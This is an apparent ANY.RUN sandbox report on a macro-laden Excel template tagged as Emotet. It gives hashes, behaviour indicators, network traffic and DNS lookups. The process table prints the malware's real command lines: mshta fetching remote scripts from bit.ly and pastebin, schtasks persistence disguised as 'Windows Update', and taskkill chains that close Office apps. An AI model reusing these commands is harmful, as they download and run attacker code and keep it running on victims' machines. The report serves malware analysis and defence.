Malware analysis Specifications___9927265.xlt Malicious activity

Add for printing

File name:	Specifications___9927265.xlt
Full analysis:	https://app.any.run/tasks/8138b543-80bd-4122-a214-49c02fd0e482
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	September 11, 2019, 09:39:36
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open emotet-doc emotet
Indicators:
MIME:	application/vnd.ms-excel
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: mana zaheer, Last Saved By: mana zaheer, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Sep 10 08:54:29 2019, Last Saved Time/Date: Tue Sep 10 08:55:13 2019, Security: 0
MD5:	9D41CAA6DE6CEB6FBEEC9142496F9F89
SHA1:	A1056E4279D9DC1AAB97A20548628794424F5D8E
SHA256:	88FA4316062F115BDA55F5EE813F142F656F4C93C080E3EAFC2489BCF484A72C
SSDEEP:	1536:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAVLviN5y7Mersnd/rH3FCXsqQjbfhgBJ:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 60 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: off
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Unusual execution from Microsoft Office
  - EXCEL.EXE (PID: 3432)
- Uses Task Scheduler to run other applications
  - mshta.exe (PID: 3924)
- Starts MSHTA.EXE for opening HTA or HTMLS files
  - EXCEL.EXE (PID: 3432)
- Loads the Task Scheduler COM API
  - schtasks.exe (PID: 2540)
  - schtasks.exe (PID: 2288)
- Changes the autorun value in the registry
  - mshta.exe (PID: 3924)
SUSPICIOUS
- Creates files in the user directory
  - mshta.exe (PID: 2608)
  - mshta.exe (PID: 3924)
- Starts MSHTA.EXE for opening HTA or HTMLS files
  - mshta.exe (PID: 2608)
- Starts CMD.EXE for commands execution
  - mshta.exe (PID: 3924)
- Application launched itself
  - mshta.exe (PID: 2608)
- Uses TASKKILL.EXE to kill process
  - cmd.exe (PID: 1008)
- Uses TASKKILL.EXE to kill Office Apps
  - cmd.exe (PID: 1008)
INFO
- Creates files in the user directory
  - EXCEL.EXE (PID: 3432)
- Reads internet explorer settings
  - mshta.exe (PID: 2608)
  - mshta.exe (PID: 3924)
- Reads Microsoft Office registry keys
  - EXCEL.EXE (PID: 3432)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xls	\|	Microsoft Excel sheet (48)
.xls	\|	Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType:	Microsoft Excel 2003 Worksheet
CompObjUserTypeLen:	32
HeadingPairs:	Worksheets 1
TitleOfParts:	Sheet1
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
Company:	-
CodePage:	Windows Latin 1 (Western European)
Security:	None
ModifyDate:	2019:09:10 07:55:13
CreateDate:	2019:09:10 07:54:29
Software:	Microsoft Excel
LastModifiedBy:	mana zaheer
Author:	mana zaheer

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3432	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 1 Version: 14.0.6024.1000
2608	mshta http://bit.ly/mylunlenahaiakslagaaki	C:\Windows\system32\mshta.exe		EXCEL.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3924	"C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/eS9WmF3u	C:\Windows\System32\mshta.exe		mshta.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
1008	"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit	C:\Windows\System32\cmd.exe	—	mshta.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2288	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "Windows Update" /tr "mshta.exe http://pastebin.com/raw/W1fzJNbg" /F	C:\Windows\System32\schtasks.exe	—	mshta.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2540	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Update" /tr "mshta.exe http://pastebin.com/raw/Gt93FF9X" /F	C:\Windows\System32\schtasks.exe	—	mshta.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3724	taskkill /f /im winword.exe	C:\Windows\system32\taskkill.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3132	taskkill /f /im excel.exe	C:\Windows\system32\taskkill.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3280	taskkill /f /im MSPUB.exe	C:\Windows\system32\taskkill.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2204	taskkill /f /im POWERPNT.EXE	C:\Windows\system32\taskkill.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

761

Read events

700

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3432	EXCEL.EXE	C:\Users\admin\AppData\Local\Temp\CVR9ADD.tmp.cvr		—
		MD5:—	SHA256:—
2608	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css		—
		MD5:—	SHA256:—
2608	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3704929657-widgets[1].js		—
		MD5:—	SHA256:—
3432	EXCEL.EXE	C:\Users\admin\AppData\Local\Temp\~DFACE0084D7BA3C322.TMP		—
		MD5:—	SHA256:—
2608	mshta.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt		text
		MD5:8CC6C15FAB6090B61A306071EB94F853	SHA256:66776FCB72A251DECFB40AB3AC30B48B9CCCBB5E02ED2DFDA8CF1DD8D2E7BF9F
2608	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\95993233-ieretrofit[1].js		html
		MD5:43AD0C19DD69995D18B1824C047A45A5	SHA256:ED723AD81C8ADD8D98D9AEDA58DA6CB9DF591DF8A8C1712601A2932130DB783F
3432	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Specifications___9927265.xlt.xls.LNK		lnk
		MD5:913832E4F55C299B032FBF83BC5EA920	SHA256:FCC9648CFABF4D4A9A62BA1180622C6770CA26BE1829304F17D5B1B7B31CC171
3432	EXCEL.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:AE1E1BA0C3A3D2A9A857992938066F2E	SHA256:FE401F4549F8C72DD09B71CCBA3B3DC7558C92309D403C711EB76F1427578AE9
2608	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js		html
		MD5:632E7FD3CA61FEF2DD2B7A9F847E5F34	SHA256:D996E8927AE45383450BD8314F8BC89259A528AAA698231FE91D2295872D0496
2608	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cb=gapi[1].loaded_0		text
		MD5:9592A9DDF920739FAD11ECB40E312905	SHA256:AEF6EEB769CC25D6F1776C5F7E97AEF03258C9B5362D72F0D7955633EADF8F09

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2608	mshta.exe	GET	301	67.199.248.11:80	http://bit.ly/mylunlenahaiakslagaaki	US	html	140 b	shared
3924	mshta.exe	GET	301	104.20.209.21:80	http://www.pastebin.com/raw/eS9WmF3u	US	html	721 b	shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2608	mshta.exe	216.58.207.34:443	pagead2.googlesyndication.com	Google Inc.	US	whitelisted
2608	mshta.exe	67.199.248.11:80	bit.ly	Bitly Inc	US	shared
2608	mshta.exe	172.217.23.161:443	myownteammana.blogspot.com	Google Inc.	US	whitelisted
2608	mshta.exe	172.217.16.169:443	www.blogger.com	Google Inc.	US	whitelisted
2608	mshta.exe	216.58.205.238:443	apis.google.com	Google Inc.	US	whitelisted
2608	mshta.exe	172.217.22.45:443	accounts.google.com	Google Inc.	US	whitelisted
3924	mshta.exe	104.20.209.21:80	www.pastebin.com	Cloudflare Inc	US	shared
3924	mshta.exe	104.20.208.21:443	www.pastebin.com	Cloudflare Inc	US	shared

DNS requests

Domain	IP	Reputation
bit.ly	67.199.248.11 67.199.248.10	shared
myownteammana.blogspot.com	172.217.23.161	whitelisted
www.blogger.com	172.217.16.169	shared
apis.google.com	216.58.205.238	whitelisted
pagead2.googlesyndication.com	216.58.207.34	whitelisted
resources.blogblog.com	172.217.16.169	whitelisted
accounts.google.com	172.217.22.45	shared
www.pastebin.com	104.20.209.21 104.20.208.21	shared
pastebin.com	104.20.208.21 104.20.209.21	shared

Threats

PID	Process	Class	Message
2608	mshta.exe	Misc activity	SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3924	mshta.exe	Misc activity	SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)

Add for printing

No debug info

General Info

Specifications___9927265.xlt

9D41CAA6DE6CEB6FBEEC9142496F9F89

A1056E4279D9DC1AAB97A20548628794424F5D8E

88FA4316062F115BDA55F5EE813F142F656F4C93C080E3EAFC2489BCF484A72C

1536:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAVLviN5y7Mersnd/rH3FCXsqQjbfhgBJ:y1k3hbdlylKsgqopeJBWhZFGkE+cL2NS

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Unusual execution from Microsoft Office

Uses Task Scheduler to run other applications

Starts MSHTA.EXE for opening HTA or HTMLS files

Loads the Task Scheduler COM API

Changes the autorun value in the registry

SUSPICIOUS

Creates files in the user directory

Starts MSHTA.EXE for opening HTA or HTMLS files

Starts CMD.EXE for commands execution

Application launched itself

Uses TASKKILL.EXE to kill process

Uses TASKKILL.EXE to kill Office Apps

INFO

Creates files in the user directory

Reads internet explorer settings

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings